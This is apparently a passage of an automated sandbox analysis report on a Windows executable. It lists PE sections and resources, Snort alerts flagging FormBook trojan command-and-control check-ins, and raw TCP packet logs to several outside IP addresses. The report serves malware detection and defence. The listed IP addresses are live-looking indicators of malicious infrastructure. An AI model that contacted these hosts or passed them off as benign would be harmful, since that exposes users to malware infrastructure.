Entrypoint Preview

Instruction
dec ebp
pop edx
nop
add byte ptr [ebx], al
add byte ptr [eax], al
add byte ptr [eax+eax], al
add byte ptr [eax], al

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x20000	0x1a166	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DEBUG	0x1ea98	0x1c	.text
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x2000	0x48	.text
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x2000	0x1cab4	0x1cc00	f4941e9be705a76449575c77769445a3	False	0.43960597826086956	data	6.219844383742301	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rsrc	0x20000	0x1a166	0x1a200	6321c90b37bd7306cd8ae91171b16293	False	0.08954470693779905	data	3.64261570816112	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_ICON	0x2024c	0x101b	PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced			0.9313606597138007
RT_ICON	0x21268	0x10828	Device independent bitmap graphic, 128 x 256 x 32, image size 65536, resolution 32395 x 32395 px/m			0.02759375369691234
RT_ICON	0x31a90	0x4228	Device independent bitmap graphic, 64 x 128 x 32, image size 16384, resolution 32395 x 32395 px/m			0.05674303259329239
RT_ICON	0x35cb8	0x25a8	Device independent bitmap graphic, 48 x 96 x 32, image size 9216, resolution 32395 x 32395 px/m			0.09304979253112033
RT_ICON	0x38260	0x10a8	Device independent bitmap graphic, 32 x 64 x 32, image size 4096, resolution 32395 x 32395 px/m			0.14681050656660413
RT_ICON	0x39308	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 1024, resolution 32395 x 32395 px/m			0.325354609929078
RT_GROUP_ICON	0x39770	0x5a	data			0.7555555555555555
RT_VERSION	0x397cc	0x3d8	data			0.4867886178861789
RT_VERSION	0x39ba4	0x3d8	data	English	United States	0.4888211382113821
RT_MANIFEST	0x39f7c	0x1ea	XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators			0.5489795918367347

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	United States

Network Behavior

Snort IDS Alerts

Timestamp	Protocol	SID	Message	Source Port	Dest Port	Source IP	Dest IP
06/05/24-15:07:33.876706	TCP	2855464	ETPRO TROJAN FormBook CnC Checkin (POST) M3	49770	80	192.168.2.4	103.168.172.37
06/05/24-15:06:21.843725	TCP	2855464	ETPRO TROJAN FormBook CnC Checkin (POST) M3	49754	80	192.168.2.4	217.160.0.111
06/05/24-15:06:49.864855	TCP	2855464	ETPRO TROJAN FormBook CnC Checkin (POST) M3	49762	80	192.168.2.4	162.0.237.22
06/05/24-15:07:52.330377	TCP	2855465	ETPRO TROJAN FormBook CnC Checkin (GET) M2	49776	80	192.168.2.4	104.37.39.71
06/05/24-15:09:00.299213	TCP	2855464	ETPRO TROJAN FormBook CnC Checkin (POST) M3	49786	80	192.168.2.4	57.151.38.169
06/05/24-15:05:53.733365	TCP	2855464	ETPRO TROJAN FormBook CnC Checkin (POST) M3	49745	80	192.168.2.4	57.151.38.169
06/05/24-15:06:08.076788	TCP	2855464	ETPRO TROJAN FormBook CnC Checkin (POST) M3	49750	80	192.168.2.4	162.241.216.140
06/05/24-15:08:47.000117	TCP	2855464	ETPRO TROJAN FormBook CnC Checkin (POST) M3	49782	80	192.168.2.4	162.241.216.140
06/05/24-15:08:09.139584	TCP	2855464	ETPRO TROJAN FormBook CnC Checkin (POST) M3	49778	80	192.168.2.4	199.59.243.225
06/05/24-15:09:11.500533	TCP	2855464	ETPRO TROJAN FormBook CnC Checkin (POST) M3	49789	80	192.168.2.4	162.241.216.140
06/05/24-15:09:14.031067	TCP	2855464	ETPRO TROJAN FormBook CnC Checkin (POST) M3	49790	80	192.168.2.4	162.241.216.140
06/05/24-15:06:26.906205	TCP	2855465	ETPRO TROJAN FormBook CnC Checkin (GET) M2	49756	80	192.168.2.4	217.160.0.111
06/05/24-15:07:09.527378	TCP	2855464	ETPRO TROJAN FormBook CnC Checkin (POST) M3	49765	80	192.168.2.4	136.143.186.12
06/05/24-15:08:52.065438	TCP	2855465	ETPRO TROJAN FormBook CnC Checkin (GET) M2	49784	80	192.168.2.4	162.241.216.140
06/05/24-15:07:17.141135	TCP	2855465	ETPRO TROJAN FormBook CnC Checkin (GET) M2	49768	80	192.168.2.4	136.143.186.12
06/05/24-15:06:19.085370	TCP	2855464	ETPRO TROJAN FormBook CnC Checkin (POST) M3	49753	80	192.168.2.4	217.160.0.111
06/05/24-15:07:44.734158	TCP	2855464	ETPRO TROJAN FormBook CnC Checkin (POST) M3	49773	80	192.168.2.4	104.37.39.71
06/05/24-15:09:27.343164	TCP	2855464	ETPRO TROJAN FormBook CnC Checkin (POST) M3	49794	80	192.168.2.4	217.160.0.111
06/05/24-15:06:13.156898	TCP	2855465	ETPRO TROJAN FormBook CnC Checkin (GET) M2	49752	80	192.168.2.4	162.241.216.140
06/05/24-15:09:05.750122	TCP	2855465	ETPRO TROJAN FormBook CnC Checkin (GET) M2	49788	80	192.168.2.4	57.151.38.169
06/05/24-15:06:05.546932	TCP	2855464	ETPRO TROJAN FormBook CnC Checkin (POST) M3	49749	80	192.168.2.4	162.241.216.140
06/05/24-15:06:40.827175	TCP	2855465	ETPRO TROJAN FormBook CnC Checkin (GET) M2	49760	80	192.168.2.4	91.195.240.123
06/05/24-15:08:14.224942	TCP	2855465	ETPRO TROJAN FormBook CnC Checkin (GET) M2	49780	80	192.168.2.4	199.59.243.225
06/05/24-15:05:35.307159	TCP	2855465	ETPRO TROJAN FormBook CnC Checkin (GET) M2	49743	80	192.168.2.4	162.241.216.140
06/05/24-15:08:44.469264	TCP	2855464	ETPRO TROJAN FormBook CnC Checkin (POST) M3	49781	80	192.168.2.4	162.241.216.140
06/05/24-15:08:57.769545	TCP	2855464	ETPRO TROJAN FormBook CnC Checkin (POST) M3	49785	80	192.168.2.4	57.151.38.169
06/05/24-15:05:51.205286	TCP	2855464	ETPRO TROJAN FormBook CnC Checkin (POST) M3	49744	80	192.168.2.4	57.151.38.169
06/05/24-15:07:12.072953	TCP	2855464	ETPRO TROJAN FormBook CnC Checkin (POST) M3	49766	80	192.168.2.4	136.143.186.12
06/05/24-15:09:24.813693	TCP	2855464	ETPRO TROJAN FormBook CnC Checkin (POST) M3	49793	80	192.168.2.4	217.160.0.111
06/05/24-15:05:51.205286	TCP	2856318	ETPRO TROJAN FormBook CnC Checkin (POST) M4	49744	80	192.168.2.4	57.151.38.169
06/05/24-15:08:06.599113	TCP	2855464	ETPRO TROJAN FormBook CnC Checkin (POST) M3	49777	80	192.168.2.4	199.59.243.225
06/05/24-15:07:38.937741	TCP	2855465	ETPRO TROJAN FormBook CnC Checkin (GET) M2	49772	80	192.168.2.4	103.168.172.37
06/05/24-15:06:33.229915	TCP	2855464	ETPRO TROJAN FormBook CnC Checkin (POST) M3	49757	80	192.168.2.4	91.195.240.123
06/05/24-15:09:32.485605	TCP	2855465	ETPRO TROJAN FormBook CnC Checkin (GET) M2	49796	80	192.168.2.4	217.160.0.111
06/05/24-15:06:54.922157	TCP	2855465	ETPRO TROJAN FormBook CnC Checkin (GET) M2	49764	80	192.168.2.4	162.0.237.22
06/05/24-15:05:58.796005	TCP	2855465	ETPRO TROJAN FormBook CnC Checkin (GET) M2	49748	80	192.168.2.4	57.151.38.169
06/05/24-15:06:35.771526	TCP	2855464	ETPRO TROJAN FormBook CnC Checkin (POST) M3	49758	80	192.168.2.4	91.195.240.123
06/05/24-15:09:19.097532	TCP	2855465	ETPRO TROJAN FormBook CnC Checkin (GET) M2	49792	80	192.168.2.4	162.241.216.140
06/05/24-15:07:47.264891	TCP	2855464	ETPRO TROJAN FormBook CnC Checkin (POST) M3	49774	80	192.168.2.4	104.37.39.71
06/05/24-15:07:31.252004	TCP	2855464	ETPRO TROJAN FormBook CnC Checkin (POST) M3	49769	80	192.168.2.4	103.168.172.37
06/05/24-15:06:47.327509	TCP	2855464	ETPRO TROJAN FormBook CnC Checkin (POST) M3	49761	80	192.168.2.4	162.0.237.22

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jun 5, 2024 15:05:35.299566031 CEST	49743	80	192.168.2.4	162.241.216.140
Jun 5, 2024 15:05:35.304764032 CEST	80	49743	162.241.216.140	192.168.2.4
Jun 5, 2024 15:05:35.304960966 CEST	49743	80	192.168.2.4	162.241.216.140
Jun 5, 2024 15:05:35.307158947 CEST	49743	80	192.168.2.4	162.241.216.140
Jun 5, 2024 15:05:35.312165022 CEST	80	49743	162.241.216.140	192.168.2.4
Jun 5, 2024 15:05:35.970736980 CEST	80	49743	162.241.216.140	192.168.2.4
Jun 5, 2024 15:05:36.003407001 CEST	80	49743	162.241.216.140	192.168.2.4
Jun 5, 2024 15:05:36.003612041 CEST	49743	80	192.168.2.4	162.241.216.140
Jun 5, 2024 15:05:36.004916906 CEST	49743	80	192.168.2.4	162.241.216.140
Jun 5, 2024 15:05:36.010004997 CEST	80	49743	162.241.216.140	192.168.2.4
Jun 5, 2024 15:05:51.198342085 CEST	49744	80	192.168.2.4	57.151.38.169
Jun 5, 2024 15:05:51.203375101 CEST	80	49744	57.151.38.169	192.168.2.4
Jun 5, 2024 15:05:51.203470945 CEST	49744	80	192.168.2.4	57.151.38.169
Jun 5, 2024 15:05:51.205286026 CEST	49744	80	192.168.2.4	57.151.38.169
Jun 5, 2024 15:05:51.210212946 CEST	80	49744	57.151.38.169	192.168.2.4
Jun 5, 2024 15:05:51.874448061 CEST	80	49744	57.151.38.169	192.168.2.4
Jun 5, 2024 15:05:51.915165901 CEST	80	49744	57.151.38.169	192.168.2.4
Jun 5, 2024 15:05:51.915235043 CEST	49744	80	192.168.2.4	57.151.38.169
Jun 5, 2024 15:05:52.708100080 CEST	49744	80	192.168.2.4	57.151.38.169
Jun 5, 2024 15:05:53.726207018 CEST	49745	80	192.168.2.4	57.151.38.169
Jun 5, 2024 15:05:53.731318951 CEST	80	49745	57.151.38.169	192.168.2.4
Jun 5, 2024 15:05:53.731414080 CEST	49745	80	192.168.2.4	57.151.38.169
Jun 5, 2024 15:05:53.733365059 CEST	49745	80	192.168.2.4	57.151.38.169
Jun 5, 2024 15:05:53.738457918 CEST	80	49745	57.151.38.169	192.168.2.4
Jun 5, 2024 15:05:54.407433033 CEST	80	49745	57.151.38.169	192.168.2.4
Jun 5, 2024 15:05:54.441708088 CEST	80	49745	57.151.38.169	192.168.2.4
Jun 5, 2024 15:05:54.441812038 CEST	49745	80	192.168.2.4	57.151.38.169
Jun 5, 2024 15:05:55.239300013 CEST	49745	80	192.168.2.4	57.151.38.169
Jun 5, 2024 15:05:56.258021116 CEST	49747	80	192.168.2.4	57.151.38.169
Jun 5, 2024 15:05:56.263322115 CEST	80	49747	57.151.38.169	192.168.2.4
Jun 5, 2024 15:05:56.263432980 CEST	49747	80	192.168.2.4	57.151.38.169
Jun 5, 2024 15:05:56.265642881 CEST	49747	80	192.168.2.4	57.151.38.169
Jun 5, 2024 15:05:56.270764112 CEST	80	49747	57.151.38.169	192.168.2.4
Jun 5, 2024 15:05:56.270796061 CEST	80	49747	57.151.38.169	192.168.2.4
Jun 5, 2024 15:05:56.270858049 CEST	80	49747	57.151.38.169	192.168.2.4
Jun 5, 2024 15:05:56.270885944 CEST	80	49747	57.151.38.169	192.168.2.4
Jun 5, 2024 15:05:56.270917892 CEST	80	49747	57.151.38.169	192.168.2.4
Jun 5, 2024 15:05:56.270946980 CEST	80	49747	57.151.38.169	192.168.2.4
Jun 5, 2024 15:05:56.270999908 CEST	80	49747	57.151.38.169	192.168.2.4
Jun 5, 2024 15:05:56.271028042 CEST	80	49747	57.151.38.169	192.168.2.4
Jun 5, 2024 15:05:56.271054983 CEST	80	49747	57.151.38.169	192.168.2.4
Jun 5, 2024 15:05:56.936400890 CEST	80	49747	57.151.38.169	192.168.2.4
Jun 5, 2024 15:05:56.985980034 CEST	80	49747	57.151.38.169	192.168.2.4
Jun 5, 2024 15:05:56.986187935 CEST	49747	80	192.168.2.4	57.151.38.169
Jun 5, 2024 15:05:57.770632982 CEST	49747	80	192.168.2.4	57.151.38.169
Jun 5, 2024 15:05:58.788747072 CEST	49748	80	192.168.2.4	57.151.38.169
Jun 5, 2024 15:05:58.794296026 CEST	80	49748	57.151.38.169	192.168.2.4
Jun 5, 2024 15:05:58.794445992 CEST	49748	80	192.168.2.4	57.151.38.169
Jun 5, 2024 15:05:58.796005011 CEST	49748	80	192.168.2.4	57.151.38.169
Jun 5, 2024 15:05:58.801549911 CEST	80	49748	57.151.38.169	192.168.2.4
Jun 5, 2024 15:05:59.453088045 CEST	80	49748	57.151.38.169	192.168.2.4
Jun 5, 2024 15:05:59.487802029 CEST	80	49748	57.151.38.169	192.168.2.4
Jun 5, 2024 15:05:59.488101959 CEST	49748	80	192.168.2.4	57.151.38.169
Jun 5, 2024 15:05:59.489016056 CEST	49748	80	192.168.2.4	57.151.38.169
Jun 5, 2024 15:05:59.494230032 CEST	80	49748	57.151.38.169	192.168.2.4
Jun 5, 2024 15:06:04.493839025 CEST	49749	80	192.168.2.4	162.241.216.140
Jun 5, 2024 15:06:05.504870892 CEST	49749	80	192.168.2.4	162.241.216.140
Jun 5, 2024 15:06:05.539762020 CEST	80	49749	162.241.216.140	192.168.2.4
Jun 5, 2024 15:06:05.539901018 CEST	80	49749	162.241.216.140	192.168.2.4
Jun 5, 2024 15:06:05.539912939 CEST	49749	80	192.168.2.4	162.241.216.140
Jun 5, 2024 15:06:05.539944887 CEST	49749	80	192.168.2.4	162.241.216.140
Jun 5, 2024 15:06:05.546931982 CEST	49749	80	192.168.2.4	162.241.216.140
Jun 5, 2024 15:06:05.551903009 CEST	80	49749	162.241.216.140	192.168.2.4
Jun 5, 2024 15:06:06.204504013 CEST	80	49749	162.241.216.140	192.168.2.4
Jun 5, 2024 15:06:06.255048990 CEST	49749	80	192.168.2.4	162.241.216.140
Jun 5, 2024 15:06:06.258377075 CEST	80	49749	162.241.216.140	192.168.2.4
Jun 5, 2024 15:06:06.258510113 CEST	49749	80	192.168.2.4	162.241.216.140
Jun 5, 2024 15:06:07.051923990 CEST	49749	80	192.168.2.4	162.241.216.140
Jun 5, 2024 15:06:08.069684982 CEST	49750	80	192.168.2.4	162.241.216.140
Jun 5, 2024 15:06:08.075202942 CEST	80	49750	162.241.216.140	192.168.2.4
Jun 5, 2024 15:06:08.075303078 CEST	49750	80	192.168.2.4	162.241.216.140
Jun 5, 2024 15:06:08.076787949 CEST	49750	80	192.168.2.4	162.241.216.140
Jun 5, 2024 15:06:08.082139015 CEST	80	49750	162.241.216.140	192.168.2.4
Jun 5, 2024 15:06:08.738002062 CEST	80	49750	162.241.216.140	192.168.2.4
Jun 5, 2024 15:06:08.770487070 CEST	80	49750	162.241.216.140	192.168.2.4
Jun 5, 2024 15:06:08.770590067 CEST	49750	80	192.168.2.4	162.241.216.140
Jun 5, 2024 15:06:09.583038092 CEST	49750	80	192.168.2.4	162.241.216.140
Jun 5, 2024 15:06:10.612962961 CEST	49751	80	192.168.2.4	162.241.216.140
Jun 5, 2024 15:06:10.618383884 CEST	80	49751	162.241.216.140	192.168.2.4
Jun 5, 2024 15:06:10.618475914 CEST	49751	80	192.168.2.4	162.241.216.140
Jun 5, 2024 15:06:10.620604992 CEST	49751	80	192.168.2.4	162.241.216.140
Jun 5, 2024 15:06:10.625726938 CEST	80	49751	162.241.216.140	192.168.2.4
Jun 5, 2024 15:06:10.625749111 CEST	80	49751	162.241.216.140	192.168.2.4
Jun 5, 2024 15:06:10.625761986 CEST	80	49751	162.241.216.140	192.168.2.4
Jun 5, 2024 15:06:10.625775099 CEST	80	49751	162.241.216.140	192.168.2.4
Jun 5, 2024 15:06:10.625787020 CEST	80	49751	162.241.216.140	192.168.2.4
Jun 5, 2024 15:06:10.625814915 CEST	80	49751	162.241.216.140	192.168.2.4
Jun 5, 2024 15:06:10.625827074 CEST	80	49751	162.241.216.140	192.168.2.4
Jun 5, 2024 15:06:10.625838995 CEST	80	49751	162.241.216.140	192.168.2.4
Jun 5, 2024 15:06:10.625855923 CEST	80	49751	162.241.216.140	192.168.2.4
Jun 5, 2024 15:06:11.280859947 CEST	80	49751	162.241.216.140	192.168.2.4
Jun 5, 2024 15:06:11.313472033 CEST	80	49751	162.241.216.140	192.168.2.4
Jun 5, 2024 15:06:11.314989090 CEST	49751	80	192.168.2.4	162.241.216.140
Jun 5, 2024 15:06:12.129968882 CEST	49751	80	192.168.2.4	162.241.216.140
Jun 5, 2024 15:06:13.149060011 CEST	49752	80	192.168.2.4	162.241.216.140
Jun 5, 2024 15:06:13.154108047 CEST	80	49752	162.241.216.140	192.168.2.4
Jun 5, 2024 15:06:13.154313087 CEST	49752	80	192.168.2.4	162.241.216.140
Jun 5, 2024 15:06:13.156898022 CEST	49752	80	192.168.2.4	162.241.216.140
Jun 5, 2024 15:06:13.161792994 CEST	80	49752	162.241.216.140	192.168.2.4
Jun 5, 2024 15:06:13.844326973 CEST	80	49752	162.241.216.140	192.168.2.4
Jun 5, 2024 15:06:13.876787901 CEST	80	49752	162.241.216.140	192.168.2.4
Jun 5, 2024 15:06:13.876879930 CEST	49752	80	192.168.2.4	162.241.216.140
Jun 5, 2024 15:06:13.877531052 CEST	49752	80	192.168.2.4	162.241.216.140
Jun 5, 2024 15:06:13.882577896 CEST	80	49752	162.241.216.140	192.168.2.4
Jun 5, 2024 15:06:19.078067064 CEST	49753	80	192.168.2.4	217.160.0.111
Jun 5, 2024 15:06:19.083122015 CEST	80	49753	217.160.0.111	192.168.2.4
Jun 5, 2024 15:06:19.083306074 CEST	49753	80	192.168.2.4	217.160.0.111
Jun 5, 2024 15:06:19.085370064 CEST	49753	80	192.168.2.4	217.160.0.111
Jun 5, 2024 15:06:19.090323925 CEST	80	49753	217.160.0.111	192.168.2.4
Jun 5, 2024 15:06:19.913511992 CEST	80	49753	217.160.0.111	192.168.2.4
Jun 5, 2024 15:06:19.913570881 CEST	80	49753	217.160.0.111	192.168.2.4
Jun 5, 2024 15:06:19.913647890 CEST	49753	80	192.168.2.4	217.160.0.111
Jun 5, 2024 15:06:20.032613993 CEST	80	49753	217.160.0.111	192.168.2.4
Jun 5, 2024 15:06:20.032730103 CEST	49753	80	192.168.2.4	217.160.0.111
Jun 5, 2024 15:06:20.598788977 CEST	49753	80	192.168.2.4	217.160.0.111
Jun 5, 2024 15:06:21.617763042 CEST	49754	80	192.168.2.4	217.160.0.111
Jun 5, 2024 15:06:21.830185890 CEST	80	49754	217.160.0.111	192.168.2.4
Jun 5, 2024 15:06:21.832812071 CEST	49754	80	192.168.2.4	217.160.0.111
Jun 5, 2024 15:06:21.843724966 CEST	49754	80	192.168.2.4	217.160.0.111
Jun 5, 2024 15:06:21.848871946 CEST	80	49754	217.160.0.111	192.168.2.4
Jun 5, 2024 15:06:22.663008928 CEST	80	49754	217.160.0.111	192.168.2.4
Jun 5, 2024 15:06:22.663048029 CEST	80	49754	217.160.0.111	192.168.2.4
Jun 5, 2024 15:06:22.663135052 CEST	49754	80	192.168.2.4	217.160.0.111
Jun 5, 2024 15:06:22.782211065 CEST	80	49754	217.160.0.111	192.168.2.4
Jun 5, 2024 15:06:22.782398939 CEST	49754	80	192.168.2.4	217.160.0.111
Jun 5, 2024 15:06:23.348830938 CEST	49754	80	192.168.2.4	217.160.0.111
Jun 5, 2024 15:06:24.367485046 CEST	49755	80	192.168.2.4	217.160.0.111
Jun 5, 2024 15:06:24.373563051 CEST	80	49755	217.160.0.111	192.168.2.4
Jun 5, 2024 15:06:24.373653889 CEST	49755	80	192.168.2.4	217.160.0.111
Jun 5, 2024 15:06:24.375466108 CEST	49755	80	192.168.2.4	217.160.0.111
Jun 5, 2024 15:06:24.380568027 CEST	80	49755	217.160.0.111	192.168.2.4
Jun 5, 2024 15:06:24.380604029 CEST	80	49755	217.160.0.111	192.168.2.4
Jun 5, 2024 15:06:24.380633116 CEST	80	49755	217.160.0.111	192.168.2.4
Jun 5, 2024 15:06:24.380696058 CEST	80	49755	217.160.0.111	192.168.2.4
Jun 5, 2024 15:06:24.380724907 CEST	80	49755	217.160.0.111	192.168.2.4
Jun 5, 2024 15:06:24.380758047 CEST	80	49755	217.160.0.111	192.168.2.4
Jun 5, 2024 15:06:24.380810976 CEST	80	49755	217.160.0.111	192.168.2.4
Jun 5, 2024 15:06:24.380842924 CEST	80	49755	217.160.0.111	192.168.2.4
Jun 5, 2024 15:06:24.380894899 CEST	80	49755	217.160.0.111	192.168.2.4
Jun 5, 2024 15:06:25.212505102 CEST	80	49755	217.160.0.111	192.168.2.4
Jun 5, 2024 15:06:25.212531090 CEST	80	49755	217.160.0.111	192.168.2.4
Jun 5, 2024 15:06:25.212630033 CEST	49755	80	192.168.2.4	217.160.0.111
Jun 5, 2024 15:06:25.331545115 CEST	80	49755	217.160.0.111	192.168.2.4
Jun 5, 2024 15:06:25.331815958 CEST	49755	80	192.168.2.4	217.160.0.111
Jun 5, 2024 15:06:25.884537935 CEST	49755	80	192.168.2.4	217.160.0.111
Jun 5, 2024 15:06:26.898813963 CEST	49756	80	192.168.2.4	217.160.0.111
Jun 5, 2024 15:06:26.904261112 CEST	80	49756	217.160.0.111	192.168.2.4
Jun 5, 2024 15:06:26.904340029 CEST	49756	80	192.168.2.4	217.160.0.111
Jun 5, 2024 15:06:26.906204939 CEST	49756	80	192.168.2.4	217.160.0.111
Jun 5, 2024 15:06:26.911278963 CEST	80	49756	217.160.0.111	192.168.2.4
Jun 5, 2024 15:06:27.737654924 CEST	80	49756	217.160.0.111	192.168.2.4
Jun 5, 2024 15:06:27.737701893 CEST	80	49756	217.160.0.111	192.168.2.4
Jun 5, 2024 15:06:27.737740040 CEST	80	49756	217.160.0.111	192.168.2.4
Jun 5, 2024 15:06:27.737773895 CEST	80	49756	217.160.0.111	192.168.2.4
Jun 5, 2024 15:06:27.737811089 CEST	80	49756	217.160.0.111	192.168.2.4
Jun 5, 2024 15:06:27.737843990 CEST	49756	80	192.168.2.4	217.160.0.111
Jun 5, 2024 15:06:27.737920046 CEST	49756	80	192.168.2.4	217.160.0.111
Jun 5, 2024 15:06:27.787031889 CEST	49756	80	192.168.2.4	217.160.0.111
Jun 5, 2024 15:06:27.856343985 CEST	80	49756	217.160.0.111	192.168.2.4
Jun 5, 2024 15:06:27.859611034 CEST	49756	80	192.168.2.4	217.160.0.111
Jun 5, 2024 15:06:27.863706112 CEST	49756	80	192.168.2.4	217.160.0.111
Jun 5, 2024 15:06:27.868647099 CEST	80	49756	217.160.0.111	192.168.2.4
Jun 5, 2024 15:06:33.222665071 CEST	49757	80	192.168.2.4	91.195.240.123
Jun 5, 2024 15:06:33.227817059 CEST	80	49757	91.195.240.123	192.168.2.4
Jun 5, 2024 15:06:33.228580952 CEST	49757	80	192.168.2.4	91.195.240.123
Jun 5, 2024 15:06:33.229914904 CEST	49757	80	192.168.2.4	91.195.240.123
Jun 5, 2024 15:06:33.234982014 CEST	80	49757	91.195.240.123	192.168.2.4
Jun 5, 2024 15:06:34.090672016 CEST	80	49757	91.195.240.123	192.168.2.4
Jun 5, 2024 15:06:34.145611048 CEST	49757	80	192.168.2.4	91.195.240.123
Jun 5, 2024 15:06:34.227412939 CEST	80	49757	91.195.240.123	192.168.2.4
Jun 5, 2024 15:06:34.227567911 CEST	49757	80	192.168.2.4	91.195.240.123
Jun 5, 2024 15:06:34.739594936 CEST	49757	80	192.168.2.4	91.195.240.123
Jun 5, 2024 15:06:35.759846926 CEST	49758	80	192.168.2.4	91.195.240.123
Jun 5, 2024 15:06:35.765060902 CEST	80	49758	91.195.240.123	192.168.2.4
Jun 5, 2024 15:06:35.767724991 CEST	49758	80	192.168.2.4	91.195.240.123
Jun 5, 2024 15:06:35.771526098 CEST	49758	80	192.168.2.4	91.195.240.123
Jun 5, 2024 15:06:35.776737928 CEST	80	49758	91.195.240.123	192.168.2.4
Jun 5, 2024 15:06:36.612572908 CEST	80	49758	91.195.240.123	192.168.2.4
Jun 5, 2024 15:06:36.652934074 CEST	49758	80	192.168.2.4	91.195.240.123
Jun 5, 2024 15:06:36.741286993 CEST	80	49758	91.195.240.123	192.168.2.4
Jun 5, 2024 15:06:36.741364956 CEST	49758	80	192.168.2.4	91.195.240.123
Jun 5, 2024 15:06:37.270843029 CEST	49758	80	192.168.2.4	91.195.240.123
Jun 5, 2024 15:06:38.290551901 CEST	49759	80	192.168.2.4	91.195.240.123
Jun 5, 2024 15:06:38.295686007 CEST	80	49759	91.195.240.123	192.168.2.4
Jun 5, 2024 15:06:38.295768023 CEST	49759	80	192.168.2.4	91.195.240.123
Jun 5, 2024 15:06:38.298269033 CEST	49759	80	192.168.2.4	91.195.240.123
Jun 5, 2024 15:06:38.303623915 CEST	80	49759	91.195.240.123	192.168.2.4
Jun 5, 2024 15:06:38.303668976 CEST	80	49759	91.195.240.123	192.168.2.4
Jun 5, 2024 15:06:38.303698063 CEST	80	49759	91.195.240.123	192.168.2.4
Jun 5, 2024 15:06:38.303726912 CEST	80	49759	91.195.240.123	192.168.2.4
Jun 5, 2024 15:06:38.303755045 CEST	80	49759	91.195.240.123	192.168.2.4
Jun 5, 2024 15:06:38.303821087 CEST	80	49759	91.195.240.123	192.168.2.4
Jun 5, 2024 15:06:38.303849936 CEST	80	49759	91.195.240.123	192.168.2.4
Jun 5, 2024 15:06:38.303878069 CEST	80	49759	91.195.240.123	192.168.2.4
Jun 5, 2024 15:06:38.303905964 CEST	80	49759	91.195.240.123	192.168.2.4
Jun 5, 2024 15:06:39.801999092 CEST	49759	80	192.168.2.4	91.195.240.123
Jun 5, 2024 15:06:39.808502913 CEST	80	49759	91.195.240.123	192.168.2.4
Jun 5, 2024 15:06:39.808646917 CEST	49759	80	192.168.2.4	91.195.240.123
Jun 5, 2024 15:06:40.820065975 CEST	49760	80	192.168.2.4	91.195.240.123
Jun 5, 2024 15:06:40.825351000 CEST	80	49760	91.195.240.123	192.168.2.4
Jun 5, 2024 15:06:40.825475931 CEST	49760	80	192.168.2.4	91.195.240.123
Jun 5, 2024 15:06:40.827174902 CEST	49760	80	192.168.2.4	91.195.240.123
Jun 5, 2024 15:06:40.832247019 CEST	80	49760	91.195.240.123	192.168.2.4
Jun 5, 2024 15:06:41.669059992 CEST	80	49760	91.195.240.123	192.168.2.4
Jun 5, 2024 15:06:41.724878073 CEST	49760	80	192.168.2.4	91.195.240.123
Jun 5, 2024 15:06:41.795986891 CEST	80	49760	91.195.240.123	192.168.2.4
Jun 5, 2024 15:06:41.796237946 CEST	49760	80	192.168.2.4	91.195.240.123
Jun 5, 2024 15:06:41.800049067 CEST	49760	80	192.168.2.4	91.195.240.123
Jun 5, 2024 15:06:41.804933071 CEST	80	49760	91.195.240.123	192.168.2.4
Jun 5, 2024 15:06:47.141486883 CEST	49761	80	192.168.2.4	162.0.237.22
Jun 5, 2024 15:06:47.323417902 CEST	80	49761	162.0.237.22	192.168.2.4
Jun 5, 2024 15:06:47.323545933 CEST	49761	80	192.168.2.4	162.0.237.22
Jun 5, 2024 15:06:47.327508926 CEST	49761	80	192.168.2.4	162.0.237.22
Jun 5, 2024 15:06:47.332423925 CEST	80	49761	162.0.237.22	192.168.2.4
Jun 5, 2024 15:06:47.994232893 CEST	80	49761	162.0.237.22	192.168.2.4
Jun 5, 2024 15:06:48.026962996 CEST	80	49761	162.0.237.22	192.168.2.4
Jun 5, 2024 15:06:48.027062893 CEST	49761	80	192.168.2.4	162.0.237.22
Jun 5, 2024 15:06:48.833235025 CEST	49761	80	192.168.2.4	162.0.237.22
Jun 5, 2024 15:06:49.852865934 CEST	49762	80	192.168.2.4	162.0.237.22
Jun 5, 2024 15:06:49.858916044 CEST	80	49762	162.0.237.22	192.168.2.4
Jun 5, 2024 15:06:49.860883951 CEST	49762	80	192.168.2.4	162.0.237.22
Jun 5, 2024 15:06:49.864855051 CEST	49762	80	192.168.2.4	162.0.237.22
Jun 5, 2024 15:06:49.869828939 CEST	80	49762	162.0.237.22	192.168.2.4
Jun 5, 2024 15:06:50.527550936 CEST	80	49762	162.0.237.22	192.168.2.4
Jun 5, 2024 15:06:50.559834003 CEST	80	49762	162.0.237.22	192.168.2.4
Jun 5, 2024 15:06:50.559916019 CEST	49762	80	192.168.2.4	162.0.237.22
Jun 5, 2024 15:06:51.367177963 CEST	49762	80	192.168.2.4	162.0.237.22
Jun 5, 2024 15:06:52.384458065 CEST	49763	80	192.168.2.4	162.0.237.22
